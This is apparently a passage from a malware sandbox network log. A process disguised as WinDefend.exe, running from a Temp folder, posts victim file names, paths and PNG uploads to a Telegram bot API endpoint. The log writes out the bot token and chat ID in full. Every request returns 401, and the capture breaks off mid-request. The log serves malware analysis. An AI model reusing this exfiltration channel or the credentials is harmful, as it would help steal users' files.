2024-05-23 13:35:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:57 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 36 34 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+64.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:57 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:57 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
237	192.168.2.5	61289	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:58 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="275f3aec-ca8f-4ace-88d4-794afa455f8a" Host: api.telegram.org Content-Length: 21235 Expect: 100-continue
2024-05-23 13:35:58 UTC	40	OUT	Data Raw: 2d 2d 32 37 35 66 33 61 65 63 2d 63 61 38 66 2d 34 61 63 65 2d 38 38 64 34 2d 37 39 34 61 66 61 34 35 35 66 38 61 0d 0a Data Ascii: --275f3aec-ca8f-4ace-88d4-794afa455f8a
2024-05-23 13:35:58 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 62 39 36 31 63 64 65 32 37 36 63 39 30 30 31 35 66 31 64 62 35 31 39 37 35 61 34 37 30 37 34 37 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 62 39 36 31 63 64 65 32 37 36 63 39 30 30 31 35 66 31 64 62 35 31 39 37 35 61 34 37 30 37 34 37 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=b961cde276c90015f1db51975a470747.png; filename*=utf-8''b961cde276c90015f1db51975a470747.png
2024-05-23 13:35:58 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 48 00 00 01 4e 08 02 00 00 00 f2 cd 75 78 00 00 00 09 70 48 59 73 00 00 17 11 00 00 17 11 01 ca 26 f3 3f 00 00 20 00 49 44 41 54 78 9c ed dd 7d 74 5b f7 79 27 f8 e7 be e0 8d 04 01 8a 92 ac b7 6b 49 8e dc c8 44 5a 6b 14 2b 21 9a c4 75 ed 29 d9 64 3c 89 7b 42 b4 3b b2 7b 5a 93 c9 94 ca 39 5b a1 7b 26 d4 d9 ed 11 b3 dd 50 73 66 57 ec 4b a8 39 5d 8b dd 96 f4 9e 53 5b d3 16 f0 9e 5a c3 a6 4b ee da f1 aa 69 81 da 89 86 49 0c 5a a9 15 cb f6 95 25 eb 85 22 2e 41 bc de 97 fd e3 21 7f ba 04 40 10 ef 00 c1 e7 33 a9 07 02 2f ee fd e1 82 bc 5f fc 5e 2f 17 7e 47 06 42 08 a9 d8 cd 8f d2 1f 7e 90 fa f8 a3 4c e1 cd 1c 6d dc ae bd d6 07 0f d8 dc 6e b1 5a 87 e6 78 4e e0 05 e0 d6 df c2 00 5d d7 75 43 07 a3 5a c7 6c 2e Data Ascii: PNGIHDRHNuxpHYs&? IDATx}t[y'kIDZk+!u)d<{B;{Z9[{&PsfWK9]S[ZKiIZ%".A!@3/_^/~GB~LmnZxN]uCZl.
2024-05-23 13:35:58 UTC	4096	OUT	Data Raw: 02 00 a0 2c 16 bd a9 54 c3 62 10 42 b6 b8 66 0c 36 58 27 db b6 75 76 2e 2c 2c 64 d4 92 47 80 e4 cd b6 ab ef 70 a9 a4 21 1d a8 56 91 1b 26 95 04 9c 84 ae aa 10 5f 5e f3 23 4d 85 e5 58 69 13 4a 54 15 ea 50 9d fd dc cf d7 fc 10 84 90 2d ab 49 83 0d f2 65 1b ce dd ae 24 db ae bc bd 66 21 12 f9 1a b7 1c 33 1e 3e 0c 9b e5 16 6e f1 18 2c 2f 43 2a 09 cb 31 d0 54 ae 84 1a 12 21 84 6c 19 4d 7d 45 5f 2f db 6e df be ad 1b 46 e1 d7 e6 6a 73 c2 a3 8f 19 59 1d 6c f7 ee 70 3f 8a c1 e1 4f 35 e9 2d dc 34 15 a2 8b b0 14 85 e5 18 c5 18 21 84 14 a5 a9 83 0d 56 b3 6d fb 8e ed ec de e1 ac de 56 46 b6 09 22 7c ea 88 71 ed 2a dc be 79 bf 81 2e 95 84 1f fd 80 93 0e 36 51 b3 a4 a6 c2 ed 8f 21 ba 08 f7 ee 34 fe 06 10 84 10 b2 b9 34 7b b0 01 80 6e 18 8b f7 16 bb ba ba d8 ad b7 45 8b Data Ascii: ,TbBf6X'uv.,,dGp!V&_^#MXiJTP-Ie$f!3>n,/C1T!lM}E_/nFjsYlp?O5-4!VmVF"\|qy.6Q!44{nE
2024-05-23 13:35:58 UTC	4096	OUT	Data Raw: 96 0e 36 14 8b 2d a7 92 29 b7 db 9d b5 7e 87 c3 e1 70 38 1c d8 ad 55 f5 80 29 10 69 9a a6 45 a3 0a 45 1a 21 84 94 87 82 0d 00 20 a3 aa 77 ee de 75 3a db db db da b3 7a b9 30 de d4 8c ba 27 74 4f ed 00 00 20 00 49 44 41 54 1c 5f 4e 25 53 95 0f 2d b1 db 6c 6d ed 6d 79 23 cd d0 8d 58 2c d6 24 83 33 09 21 64 93 a2 60 bb 2f 16 5b 4e 24 92 79 87 da 8b 16 d1 ed 76 83 1b 52 c9 54 32 95 4c a7 33 a5 36 51 5a 44 d1 66 b7 39 1c 8e f5 56 45 8b 2f c7 63 b1 58 d3 4e 15 27 84 90 cd 82 82 6d 0d 6c 06 c4 78 cb 5b a9 b2 d9 6d b8 ae 95 a6 69 38 33 3a a3 aa 9a a6 e5 e6 1c cf 71 a2 c5 62 11 45 d1 22 5a ad d6 02 ab 7c d6 a1 33 8f 10 42 b6 0e 0a b6 3c d2 e9 f4 c2 42 da 22 8a 6d ed 6d eb 4d 94 16 04 c1 e1 70 c0 06 0b 83 6c 80 22 8d 10 42 aa ae 65 ef a0 5d b9 8c aa 46 a3 ca ad 8f Data Ascii: 6-)~p8U)iEE! wu:z0'tO IDAT_N%S-lmmy#X,$3!d`/[N$yvRT2L36QZDf9VE/cXN'mlx[mi83:qbE"Z\|3B<B"mmMpl"Be]F
2024-05-23 13:35:58 UTC	4096	OUT	Data Raw: 1a ff d4 f1 4f ba 3e b0 f3 3f 12 89 94 fa d5 b8 98 98 cc dd 0c 1b 18 47 47 cf e0 ac 3e f3 e4 07 54 e7 33 e0 f7 fb 65 f9 94 2c cb e3 e3 e7 c6 c7 cf 61 1d 8b 95 b9 f0 4f f3 0a 85 c2 6c 04 4d 5d de 41 1e 91 48 04 1f 3c fe f8 13 8d 2a 43 b3 95 a4 b1 28 d8 c8 96 80 cd 74 1d 1d 1d e3 e3 e7 64 59 0e 85 c2 0d 99 a3 6d 9e 33 5e e4 37 fa ca f9 7c fd 5e 6f cf d4 d4 8b d8 ea 38 3c 7c 4a 96 4f e6 1d d4 57 07 1e 4f f7 85 0b 2f 05 02 c1 60 f0 15 59 96 71 5c 03 eb 6b 2c fc d3 5c 81 40 10 07 e3 e0 a0 3e c8 69 97 ab b3 bc ad a6 92 b4 6f 2b 97 a4 21 28 d8 c8 16 32 38 38 80 5d e8 ac bd c5 eb ed c1 af fc f5 b9 d0 e3 9c 71 9f af df 3c 50 b3 c8 f5 76 d9 78 f4 c2 91 9c 77 33 49 92 46 46 4e 0f 0c 3c 3f 3e 7e 6e 66 66 16 2b 43 ac 9f af 9e 67 00 56 47 7c 0c 0e 0e 84 42 e1 d1 d1 33 Data Ascii: O>?GG>T3e,aOlM]AH<*C(tdYm3^7\|^o8<\|JOWO/`Yq\k,\@>io+!(288]q<Pvxw3IFFN<?>~nff+CgVG\|B3
2024-05-23 13:35:58 UTC	4096	OUT	Data Raw: 72 fb 50 c3 c0 9b ac a9 ea 6b 7f f7 b7 15 ee f0 a9 a7 9e fc 93 3f f9 63 f6 cf b7 de fa c1 0b 2f 9c cf 4a ac d7 5e 7b fd d8 b1 63 59 f5 b9 13 27 86 f6 ee dd 3b 32 f2 ad 4a 8e 3e 3d fd 77 cf 3c f3 95 83 07 0f b2 b9 32 55 9f 3c fa 05 cd 00 00 11 15 49 44 41 54 28 43 08 59 0f e6 59 ee f3 75 fb 33 a4 51 91 64 85 61 00 0e 1b 99 7b 33 74 fb e3 1b 95 ec ea f0 e1 c3 a3 a3 df 66 ff 3c 7f 7e e2 6b 5f fb 7a f1 f5 b0 af 7c e5 cb bf f9 9b cf 55 52 00 00 78 f9 e5 0b 38 36 92 d6 22 21 a4 49 d4 ed cb 25 05 1b 01 00 ac ad e9 ba a1 eb ba fe 8f af cd 54 b8 b3 d1 d1 6f 3b 9d 4e 7c fc ad 6f fd cf 2f bc 70 be d4 3d 0c 0f 7f f3 f0 e1 c3 95 94 e1 7b df 7b e3 a3 8f 3e c2 60 cb 7b c3 36 42 48 ab 12 59 0f 07 d9 b2 70 ea 1a af 6a 86 ae 7d f8 de 55 25 7a af 92 bd 7d e3 1b 27 0e 1f fe Data Ascii: rPk?c/J^{cY';2J>=w<2U<IDAT(CYYu3Qda{3tf<~k_z\|URx86"!I%To;N\|o/p={{>`{6BHYpj}U%z}'
2024-05-23 13:35:58 UTC	379	OUT	Data Raw: 44 10 84 e6 b9 d9 4d 34 1a a5 db 19 93 66 e0 70 38 dc 6e 77 a3 4b d1 a4 28 d8 c8 26 70 f3 e6 cd 7d fb f6 75 75 75 35 b0 0c e9 74 fa bd f7 de a3 54 23 cd c3 e1 70 3c fc f0 c3 74 17 dc 5c d4 14 49 36 01 4d d3 3e f8 e0 83 68 34 da c0 02 50 aa 91 66 93 48 24 de 7d f7 5d 4d d3 1a 5d 90 a6 43 c1 46 36 8d eb d7 af 37 ea d0 0b 0b 0b 94 6a a4 09 25 12 89 85 85 85 46 97 a2 e9 50 b0 91 4d 23 9d 4e 37 2a 5d 1a 58 59 24 a4 30 fa e5 cc 45 c1 46 36 13 6a 75 21 84 6c 88 82 8d 6c 26 d4 4f 4e 08 d9 10 05 1b d9 34 ac 56 ab c3 e1 68 c8 a1 9d 4e 67 43 8e 4b c8 86 68 d0 7f 2e 0a 36 b2 69 ec db b7 af 51 87 de b9 73 67 93 4c a4 23 c4 cc 6a b5 36 76 1a 4c 73 a2 60 23 9b c3 fe fd fb 1b f8 cd 54 10 84 87 1e 7a a8 51 f5 45 42 f2 72 38 1c 0f 3d f4 10 b5 cf e7 e2 3e f8 e0 83 46 97 81 Data Ascii: DM4fp8nwK(&p}uuu5tT#p<t\I6M>h4PfH$}]M]CF67j%FPM#N7*]XY$0EF6ju!ll&ON4VhNgCKh.6iQsgL#j6vLs`#TzQEBr8=>F
2024-05-23 13:35:58 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 32 37 35 66 33 61 65 63 2d 63 61 38 66 2d 34 61 63 65 2d 38 38 64 34 2d 37 39 34 61 66 61 34 35 35 66 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --275f3aec-ca8f-4ace-88d4-794afa455f8aContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:58 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:58 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:58 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
238	192.168.2.5	61290	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:58 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 246 Expect: 100-continue
2024-05-23 13:35:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:58 UTC	246	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6f 72 65 5f 69 63 6f 6e 73 5f 5f 72 65 74 69 6e 61 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 68 69 5f 63 6f 6e 74 72 61 73 74 25 35 43 63 6f 72 65 5f 69 63 6f 6e 73 5f 5f 72 65 74 69 6e 61 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 34 31 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+core_icons__retina_hiContrast_bow.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Chi_contrast%5Ccore_icons__retina_hiContrast_bow.png%0ASize%3A+41+KB
2024-05-23 13:35:58 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:58 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
239	192.168.2.5	61293	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:58 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="cdf1892d-44ac-4fbd-bfb5-688fedbe445c" Host: api.telegram.org Content-Length: 1821 Expect: 100-continue
2024-05-23 13:35:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:58 UTC	40	OUT	Data Raw: 2d 2d 63 64 66 31 38 39 32 64 2d 34 34 61 63 2d 34 66 62 64 2d 62 66 62 35 2d 36 38 38 66 65 64 62 65 34 34 35 63 0d 0a Data Ascii: --cdf1892d-44ac-4fbd-bfb5-688fedbe445c
2024-05-23 13:35:58 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 39 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 39 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=96.png; filename*=utf-8''96.png
2024-05-23 13:35:58 UTC	1505	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 60 00 00 00 60 08 06 00 00 00 e2 98 77 38 00 00 05 a8 49 44 41 54 78 9c ed 9d 4f 8b 1c 45 14 c0 7f af ba 67 93 b8 99 65 24 e6 e8 cd e0 25 1e bc 04 83 07 11 0f 82 17 51 30 78 57 91 f8 09 92 db de 36 df 20 88 1f 40 5c 72 16 f4 90 20 04 36 1f 20 82 07 45 f0 cf 41 25 32 66 36 ee 66 a6 bb 9e 87 ee 9e e9 fc 59 a3 d3 9d 7a b5 b3 f5 83 61 d8 5d b6 fa 55 ff ba ba 7b 5e bd e9 82 44 22 d1 13 ba 4d 66 1d c3 41 28 88 75 0c 8f a3 97 a0 54 11 11 74 fe f3 0d 8e 33 60 c0 9d fa 17 a7 fa d8 4a 07 ee 80 bc cd 44 41 84 45 9c 31 d0 db 51 a1 9b e4 fe 35 f7 81 38 79 a7 98 e9 8b 4e 64 84 56 ed ab 5a 1d 7d aa e2 44 45 d4 4d 7e f0 5b a3 8f b8 a2 9b 38 d9 c4 db c4 f3 28 9d 76 4c 73 44 e9 37 3c 5f 96 d9 e7 d9 3a af 32 03 0a 50 Data Ascii: PNGIHDR``w8IDATxOEge$%Q0xW6 @\r 6 EA%2f6fYza]U{^D"MfA(uTt3`JDAE1Q58yNdVZ}DEM~[8(vLsD7<_:2P
2024-05-23 13:35:58 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 63 64 66 31 38 39 32 64 2d 34 34 61 63 2d 34 66 62 64 2d 62 66 62 35 2d 36 38 38 66 65 64 62 65 34 34 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --cdf1892d-44ac-4fbd-bfb5-688fedbe445cContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:58 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:58 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 63 64 66 31 38 39 32 64 2d 34 34 61 63 2d 34 66 62 64 2d 62 66 62 35 2d 36 38 38 66 65 64 62 65 34 34 35 63 2d 2d 0d 0a Data Ascii: --cdf1892d-44ac-4fbd-bfb5-688fedbe445c--
2024-05-23 13:35:59 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:59 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
240	192.168.2.5	61296	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:19 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:36:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:20 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 32 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+128.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:36:20 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:20 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
241	192.168.2.5	61297	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:21 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="b7e61f92-a196-4212-b075-a2088c6c54ad" Host: api.telegram.org Content-Length: 2326 Expect: 100-continue
2024-05-23 13:36:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:21 UTC	40	OUT	Data Raw: 2d 2d 62 37 65 36 31 66 39 32 2d 61 31 39 36 2d 34 32 31 32 2d 62 30 37 35 2d 61 32 30 38 38 63 36 63 35 34 61 64 0d 0a Data Ascii: --b7e61f92-a196-4212-b075-a2088c6c54ad
2024-05-23 13:36:21 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 32 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 32 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=128.png; filename*=utf-8''128.png
2024-05-23 13:36:21 UTC	2008	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 07 9f 49 44 41 54 78 9c ed 9d 4f 88 25 57 15 87 7f e7 56 bd bf dd 13 33 c8 c8 a0 04 71 14 02 8e 28 e2 42 d0 a0 e3 42 94 20 d9 48 07 37 ea c2 3f 0b f7 4e 90 38 e3 8b 21 48 7a d6 66 21 ba 30 08 0a 6f 69 10 dc c4 46 14 8c 28 c1 84 11 c4 41 92 01 9d 98 44 66 74 e6 4d 77 bf 57 75 7f 2e 6e 55 77 27 44 62 4f aa ea 9d 5b f7 7c 30 bc 45 c3 ab 53 f7 7e f7 dc ba f7 9d 5b 03 18 86 61 18 89 22 dd 5d 8a 82 ad b9 db da da c2 2b 7f ee f2 ba cd b3 73 79 4e cc 1f 2c d7 1d 47 1c 90 02 30 ea 0e 7f 63 fa 71 4f 79 bb 5f 4f 81 08 01 e0 be d9 8d 33 83 7c f0 59 a0 7c 2f c4 9d 06 65 44 01 85 3e a6 86 f4 83 d1 a6 bb f6 f2 8b bf 7a fe 92 7c 3f 48 10 ee 2f 56 5a 14 20 34 ce 27 1e Data Ascii: PNGIHDR>aIDATxO%WV3q(BB H7?N8!Hzf!0oiF(ADftMwWu.nUw'DbO[\|0ES~[a"]+syN,G0cqOy_O3\|Y\|/eD>z\|?H/VZ 4'
2024-05-23 13:36:21 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 62 37 65 36 31 66 39 32 2d 61 31 39 36 2d 34 32 31 32 2d 62 30 37 35 2d 61 32 30 38 38 63 36 63 35 34 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --b7e61f92-a196-4212-b075-a2088c6c54adContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:36:21 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:36:21 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 62 37 65 36 31 66 39 32 2d 61 31 39 36 2d 34 32 31 32 2d 62 30 37 35 2d 61 32 30 38 38 63 36 63 35 34 61 64 2d 2d 0d 0a Data Ascii: --b7e61f92-a196-4212-b075-a2088c6c54ad--
2024-05-23 13:36:21 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:21 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
242	192.168.2.5	61298	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:22 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:36:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:22 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 39 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: 